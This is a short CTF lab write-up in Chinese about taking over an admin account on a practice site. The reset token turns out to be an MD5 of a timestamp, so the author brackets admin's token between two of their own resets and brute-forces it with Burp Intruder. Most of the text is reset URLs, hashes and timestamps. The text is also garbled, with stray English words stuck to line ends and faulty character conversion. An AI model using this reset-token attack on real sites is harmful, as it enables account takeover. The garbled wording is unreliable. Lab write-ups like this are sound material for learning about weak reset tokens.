http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/php
點擊忘記密碼,觀察返回信息html
admin用戶web
admin123用戶3d
咱們分析重置密碼的連接請求:htm
http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=64b157a411e59077fcea643739723797&username=admin123blog
http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=155c528733ea476b64f7dcda45b95ae4&username=admin456md5
http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=8cffd052bb1b485b714f5a4654cc64e4&username=admin789get
sukey=64b157a411e59077fcea643739723797請求
惟有這個參數不一致,看樣子是MD5,進行解密試試:密碼
看起來是時間戳,咱們進行轉換下格式看看
那麼這裏admin的重置鏈接具體爲多少呢?咱們這樣猜想,先找回admin123的密碼,而後找回admin的密碼,再找回admin123的密碼,之間的時間戳就是admin的,那麼嘗試進行爆破便可。
http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=a2c58e13046e75028b102d744dec8f74&username=admin123
admin
http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=98cee838562bb14b378ab1b0d37836a2&username=admin123
a2c58e13046e75028b102d744dec8f74---1566811472
98cee838562bb14b378ab1b0d37836a2---1566811494
admin的重置sukey 就介於:1566811472 到 1566811494 之間
咱們嘗試爆破下看看:
請求:http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=98cee838562bb14b378ab1b0d37836a2&username=admin
burp進行截斷髮送到intruder模塊:
能夠看待順利枚舉出密碼重置鏈接,獲取key